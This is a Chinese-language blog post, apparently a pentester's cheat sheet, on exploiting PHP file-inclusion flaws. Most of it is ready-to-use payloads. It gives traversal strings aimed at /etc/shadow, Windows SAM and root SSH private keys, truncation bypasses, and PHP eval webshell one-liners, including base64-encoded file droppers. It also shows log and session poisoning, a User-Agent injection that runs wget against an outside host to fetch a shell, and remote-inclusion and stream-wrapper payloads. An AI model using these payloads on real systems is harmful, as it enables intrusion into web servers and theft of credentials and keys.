web渗透之文件包含利用技巧

最新推荐文章于 2022-10-21 16:30:13 发布
最新推荐文章于 2022-10-21 16:30:13 发布
阅读量210 收藏 1
点赞数
分类专栏: web渗透测试心得
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tempulcc/article/details/108844872
版权

web渗透之文件包含利用技巧

php中四个包含文件函数:include(),include_once(),require()和require_once()

1.本地文件包含LFI

(1)普通本地文件包含

 检测源码示例  
  ----include.php--------------------------------------------
    <?php include($_GET['file']);?>
    <?php include("inc/".$_GET['file']);?>
    <?php $query=$_GET['file']; include($query);?>


1)包含同目录下的文件
  ?file=.htaccess

2)包含上传文件
  ?file=../attachment/media/test.jpg
  将一句话木马或php代码嵌入到任何文件中,如:test.jpg,以包含的方式执行php代码
    <?php @eval($_POST['qqmm']);?>
    <?php fputs(fopen("./upgrade.php","w"),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydxcW1tJ10pOz8+'));?>
    <?php file_put_contents('./parks.png',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydxcW1tJ10pOz8+'));?>

3)目录遍历
  [前提] linux环境,需要root权限
  ?file=../../../../../../../../../var/lib/locate.db
  ?file=../../../../../../../../../var/lib/mlocate/mlocate.db

4)一些敏感文件
  Windows系统
  ?file=../../../../../../../../../boot.ini
  ?file=../../../../../../../../../windows/system32/inetsrv/MetaBase.xml			//IIS配置文件
  ?file=../../../../../../../../../windows/repair/sam
  ?file=../../../../../../../../../windows/php.ini

  Linux系统
  ?file=../../../../../../../../../etc/passwd
  ?file=../../../../../../../../../etc/shadow
  ?file=../../../../../../../../../proc/version
  ?file=../../../../../../../../../proc/self/fd/fd[0-9]* (文件标识符)
  ?file=../../../../../../../../../proc/mounts
  ?file=../../../../../../../../../proc/config.gz
  ?file=../../../../../../../../../etc/my.conf						//mysql配置文件
  ?file=../../../../../../../../../etc/php.ini						//可以判断是否允许远程文件包含,可以查看上传临时文件存放目录
  ?file=../../../../../../../../../etc/httpd/conf/httpd.conf				//可以找到网站的绝对路径
  ?file=../../../../../../../../../usr/local/apache2/conf/httpd.conf			//Apache默认配置文件
  ?file=../../../../../../../../../usr/local/app/apache2/conf/httpd.conf			//Apache2默认配置文件
  ?file=../../../../../../../../../usr/local/app/apache2/conf/extra/httpd-vhost.conf	// 虚拟网站配置
  ?file=../../../../../../../../../var/log/apache/error.log
  ?file=../../../../../../../../../root/.ssh/authorized_keys
  ?file=../../../../../../../../../root/.ssh/id_rsa
  ?file=../../../../../../../../../root/.ssh/id_rsa.keystore
  ?file=../../../../../../../../../root/.ssh/id_rsa.pub
  ?file=../../../../../../../../../root/.ssh/known_hosts
  ?file=../../../../../../../../../root/.bash_history
  ?file=../../../../../../../../../root/.mysql_history

(2)有限制的本地文件包含

 检测源码示例
--------include.php----------------------------------------------
    <?php include("inc/".$_GET['file'].".html");?>
    <?php $filename  = $_GET['filename']; include($filename.".html");?>
-----------------------------------------------------------------

1)%00截断
  [前提] php.ini中magic_quotes_gpc=Off,php版本小于5.3.4有效
  ?file=../../../../../../../../../etc/passwd%00

2)%00截断目录遍历
  [前提] php.ini中magic_quotes_gpc=Off,unix文件系统,比如FreeBSD,OpenBSD,NetBSD,Solaris
  ?file=../../../../../../../../../var/www/%00

3)路径长度截断
  检测源码示例

  [前提] php版本小于5.2.8,linux下目录最大长度为4096字节,windows下目录最大长度为256字节,超出的部分会被丢弃
  ?file=../../../../../../../../../etc/passwd/././././././.[......]/././././././

4)点号截断
  [前提] php版本小于5.2.8,只适用于windows,点号需要长于256字节
  ?file=../../../../../../../../../boot.ini/......................[......].............

(3)文件包含拿webshell的一些技巧

1)利用access.log日志文件拿webshell
  a)从apache配置文件中找到access.log日志文件的保存位置
    ?file=../../../../../../../../../etc/httpd/conf/httpd.conf

  b)访问任意链接,插入一句话木马
    http://www.test.com/index.php<?php @eval($_POST['qqmm']);?>
    [注] 浏览器提交时会进行url编码,需要使用burpsuite抓包修改回来,保证日志中写入的是未编码的php代码

  c)包含access.log日志文件拿webshell
    http://www.test.com/include.php?file=../../logs/access.log

2)利用auth.log日志(ssh日志)文件拿webshell
  a)检查/var/log/auth.log是否可访问
    ?file=../../../../../../../../../var/log/auth.log

  b)ssh远程登录,插入一句话木马
    ssh '<?php @eval($_POST['qqmm'])?>'@ip地址
    [注] 全部都是单引号,传入的时候会过滤单引号,变成<?php @eval($_POST[qqmm])?>@ip地址,保存在auth.log日志中

  c)包含auth.log日志文件拿webshell
    http://www.test.com/include.php?file=../../var/log/auth.log

3)利用/proc/self/environ环境变量拿webshell
  a)检查/proc/self/environ是否可访问
    ?file=../../../../../../../../../proc/self/environ
    如果看到类似如下信息:
      DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html......
    说明可以访问,如果返回空白页,说明无法访问,也可能操作系统是FreeBSD

  b)篡改链接中的User-Agent信息注入恶意代码
    (a)利用burp suite截包提交
  User-Agent:<?system('wget http://hack.com/evils.txt -O shell.php');?>
    (b)利用curl直接提交
  curl -H "USER-AGENT:<?system('wget http://hack.com/evils.txt -O shell.php');?>" www.test.com/view.php?page=../../../../../proc/self/environ

  c)连接webshell

4)利用session临时文件拿webshell
  a)检查利用条件
    (a)检查网站是否保存临时session文件
    (b)检查session中是否有可控的变量,如url中的变量值、用户名等等;检查服务器是否会把报错信息写入session文件,控制报错语句
    从apache配置文件中找到session文件的保存位置
    ?file=../../../../../../../../../etc/httpd/conf/httpd.conf
    其他可能存放session文件的路径:
    ?file=../../../../../../../../../tmp/
    ?file=../../../../../../../../../var/lib/php/session/
    ?file=../../../../../../../../../var/lib/php/session_www/
    ?file=../../../../../../../../../var/lib/php/session_其他目录/
	?file=../../../../../../../../../windows/temp/
  	 session文件的文件名一般以sess_SESSIONID来保存

  c)包含session文件拿webshell

5)利用phpinfo文件拿webshell
   a)php允许向任意php脚本上传文件,即算该脚本并没有处理上传的代码,上传的文件将被临时保存,当该脚本页面加载完成时,临时文件要么被删除,要么被重命名存放

   b)向phpinfo文件post上传任意数据,phpinfo的[PHP Variables]栏中会返回该上传文件保存的路径及临时文件名

	```php
	POST /phpcms/phpinfo.php HTTP/1.1
	Host: IP地址
	User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
	Accept-Encoding: gzip, deflate
	Cookie: loginpass=320a72d24f60e35d6df0c38b34ed74b7
	Connection: close
	Upgrade-Insecure-Requests: 1
	Content-Type:  multipart/form-data; boundary=-----7dbff1ded0714--
	Content-Length: 273
	
	-----------------------------7dbff1ded0714--------------
	Content-Disposition: form-data; name="dummyname"; filename="test.txt"
	Content-Type: text/plain
	
	<?php echo hello;?>
	-----------------------------7dbff1ded0714--------------
	```
	
	phpinfo [PHP Variables]
	Variable     | Value
	-------- | -----
	_FILES["dummyname"]  | Array( [name] => test.txt,[type] => text/plain, [tmp_name] => /tmp/php0Mk3X8,[error] => 0, [size] => 273)|	

	可以发现上传的临时文件为/tmp/php0Mk3X8


    c)向post文件的http header中尽可能添加无效数据,延缓脚本完全加载的时间,延长临时文件的生命周期,此时利用包含漏洞包含临时文件,可获得webshell

2.远程文件包含RFI

(1)普通远程文件包含

 检测源码示例
--------include.php----------------------------------------------
    <?php include($_GET['file']);?>
   

1)远程代码执行
  [前提] php.ini中allow_url_fopen开启并且allow_url_include开启
  ?file=[http|https|ftp]://example.com/shell.txt

2)利用php://input执行post数据
  [前提] php.ini中allow_url_fopen开启并且allow_url_include开启
  ?file=php://input
  post data:<?php system('ifconfig');?>
             <?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>

3)利用php://filter查看php源代码
  [前提] php.ini中allow_url_fopen开启,不需要开启allow_url_include
  ?file=php://filter/convert.base64-encode/resource=index.php
  ?file=php://filter/read=convert.base64-encode/resource=index.php
    此时获得base64编码后的php源代码,解码后可得原文

4)利用data://伪协议执行命令、查看php源代码
  [前提] php.ini中allow_url_include开启
  ?file=data://text/plain,<?php system('ipconfig')?>
  ?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+
  ?file=data://text/plain;charset=utf-8,<?php system('cat /var/www/index.php')?>

5)利用phar://伪协议执行命令
  ?file=phar://[压缩文件]/[shell文件]	//PHP>=5.3.0,压缩包必须是zip协议压缩,格式后缀可以是任意
  ?file=phar://hackerUpload.png/shell.php

6)利用zip://伪协议执行命令
  ?file=zip://[压缩文件绝对路径]#[shell文件]
  ?file=zip://hackerUpload.png%23shell.php	//PHP>=5.3.0,注意windows下要5.3.0<PHP<5.4.0,url中#要改为%23

(2)有限制的远程文件包含

  检测源码示例
--------include.php----------------------------------------------
    <?php include($_GET['file'].".html");?>

[前提] php.ini中allow_url_fopen开启并且allow_url_include开启
?file=http://example.com/shell
?file=http://example.com/shell.txt?
?file=http://example.com/shell.txt%23
tempulcc
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透文件包含漏洞-学习笔记分享
weixin_52112965的博客
07-16 1094
文件包含知识的总结
文件包含技巧拓展】————1、常见文件包含发生场景与防御
Fly_鹏程万里
01-30 1734
前言 PHP是一种非常流行的Web开发语言,互联网上的许多Web应用都是利用PHP开发的。而在利用PHP开发的Web应用中,PHP文件包含漏洞是一种常见的漏洞。利用PHP文件包含漏洞入侵网站也是主流的一种攻击手段。本文对PHP文件包含漏洞的形成、利用技巧及防范进行了详细的分析,希望对大家攻击方法和防御上有帮助。如果内容有错误纰漏,请留言指正哦~ 一、 文件包含概念 1、 概念 "代码注入"...
文件包含技巧拓展】————4、文件包含漏洞(下)
Fly_鹏程万里
01-30 428
之前已经总结了一次文件包含漏洞相关的知识点,最近一段时间做CTF又遇到了不少以前没见过的包含新姿势,这里在总结一下,以后看的时候方便一些。 phar LFI 0x01 什么是phar文件 phar是一个文件归档的包,类似于Java中的Jar文件,方便了PHP模块的迁移。 php中默认安装了这个模块。 0x02 创建一个phar文件 在创建phar文件的时候要注意phar.readonl...
web-文件包含
diemozao8175的博客
09-09 292
提示 构造payload ?file=flag.php 得到一串字符,那么我们用PHP伪协议尝试一下 构造payload ?file=php://filter/read=convert.base64-encode/resource=flag.php SSBoYXZlIGEgZmxhZyEKPD9waHAgCgovL0ZsYWc6IG...
文件包含技巧拓展】————3、文件包含漏洞(上)
Fly_鹏程万里
01-30 600
导语: 当程序员在编写代码的过程中,由于使用PHP文件包含函数过滤不严,从而导致了文件包含漏洞。在PHP中用于文件包含的函数有四个: require require_once include include_once include和require区别主要是include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错并退出程序...
WEB渗透——新手入门之初级工具利用
01-16
总之,"WEB渗透——新手入门之初级工具利用"这一主题涵盖了网络安全基础、Web应用漏洞识别和利用的一系列知识。初学者应从掌握基础工具开始,逐步深入到更复杂的渗透测试技巧,始终保持对安全的最佳实践的理解和应用...
WEB渗透学习-upload-labs靶场
04-20
6. **文件包含漏洞**:掌握如何利用文件包含漏洞执行远程或本地文件。 7. **PHP反序列化漏洞**:学习如何构造恶意的PHP对象,利用反序列化漏洞执行代码。 8. **Webshell上传**:了解如何上传Webshell并利用其进行...
WEB安全渗透课程ppt
01-04
文件包含漏洞】讲解了文件包含漏洞的类型和利用方式,以及防范措施。 - 【13.XSS跨站脚本漏洞】解释了XSS攻击的原理,包括反射型、存储型和DOM型,以及相应的防护策略。 - 【14.CSRF跨站请求伪造】章节介绍了CSRF...
Web渗透测试-常见漏洞解析课件
03-23
通过本课程的学习,你将不仅理解Web渗透测试的基本概念,还能掌握一些实用的技巧和工具,提高你在实际工作中识别和处理安全问题的能力。无论是为了自我提升还是职业发展,这都是一个不可或缺的知识板块。记得,安全...
Web渗透测试工程师—初级教程.zip
11-25
Web渗透测试是网络安全领域的一个重要组成部分,主要针对Web应用程序进行安全评估,发现并修复潜在的安全漏洞。本初级教程将引导初学者逐步理解Web渗透测试的基础知识,为后续深入学习打下坚实基础。 第一章:你...
web.xml+详细解析四合一
10-25
web.xml+详细解析四合一,详细系统地讲解xml的应用。可以提高对xml的理解
Web日志目录及日志分析
谢公子的博客
11-07 1万+
目录 Apache Nginx Tomcat Web日志的分析 在很多时候,我们经常需要分析网站的日志,以此来查看网站运行的各种情况。比如说如果网站被攻击,我们可以通过查看日志来溯源攻击者。 Apache 日志目录:/Apache/logs/ logs目录下有两个文件,一个是 access.log ,就是用户的访问日志。还有一个是error.log,这个是apache运行...
【CTF WEB】文件包含
weixin_30949361的博客
09-29 543
文件包含 题目要求: 请找到题目中FLAG 漏洞源码 <meta charset='utf-8'> <center><h1>文件阅读器</h1></center> <!-- 据说flag在flag.php里 --> <?php error_reporting(0); $f=$_GET['file']; if(s...
CGI漏洞利用
热门推荐
矿野上的脚印
07-18 1万+
CGI漏洞利用CGI漏洞是网管最容易乎视的地方,就我测试的这个网站上的漏洞, 我简单说一下,几个常见的漏洞地方。一般原理,解决方法,如果没有写全,请参考一些文献。 1,名字:?PageServices漏洞 这个漏洞是很多网站都有的。但是有好多人扫描出来确不知道如何运用,在此我简单谈一下吧,! 这个是可以显示页面清单的 方法是url/?PageServices 还可以这样试试 ! /?wp-cs-d
南邮CTF - Web - 文件包含
烟雨天青色
07-26 1459
题目来源:南京邮电大学网络攻防训练平台 题目链接:http://4.chinalover.sinaapp.com/web7/ 解题过程:首先,打开题目地址,展现在眼前的是如下一个页面: 做 web 题,首先就是查看网页源代码了,我先不点击“click me?no”,先看看源代码有没有什么异常的东西。 其实什么都没有,就是这个超链接背后的页面。 现在,我们点击链接打开这个页面看一看...
PHP漏洞全解————10、PHP文件包含漏洞
Fly_鹏程万里
07-05 8275
基本相关函数&lt;&gt;php中引发文件包含漏洞的通常是以下四个函数:include()include_once()require()require_once()reuqire() 如果在包含的过程中有错,比如文件不存在等,则会直接退出,不执行后续语句。...
ctf show-web入门 文件包含
volcano的博客
01-19 1340
最近和朋友一起入了ctf show的坑,在这里记录一下刷题过程以及从大佬那里学到的姿势 1文件包含环境要求:常见文件包含函数web78php://inputphp://filterweb79web80日志文件包含web81web82session.upload_progressweb83-86web87filter伪协议写入木马web88 文件包含 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 一般利用一些文件包含函数或者伪协
ctf中怎样获取php文件源码,CTF中文件包含的一些技巧
weixin_39580682的博客
03-09 3669
前言文件包含在 CTF 比赛也是常考的一个点,这里对一些包含点的原理、特征进行一些总结,并结合实际的例子来讲解如何绕过。php伪协议的分类伪协议是文件包含的基础,理解伪协议的的原理才能更好的利用文件包含漏洞。php://inputphp://input代表可以访问请求的原始数据,简单来说POST请求的情况下,php://input可以获取到post的数据。使用条件:include()、includ...
WEB渗透文件包含漏洞
qq_65395016的博客
10-21 1362
文件包含漏洞
Web渗透-网络安全面试 面试宝典 2023最新版65页超全解析.pdf
最新发布
10-16
- **手动检测**:包括但不限于检查目录权限、文件包含漏洞和远程代码执行。 4. **其他技术**: - **权限提升与内网渗透**:掌握如何通过越权访问、逻辑漏洞获取更高权限,以及如何利用WAF绕过和后门分析进行系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值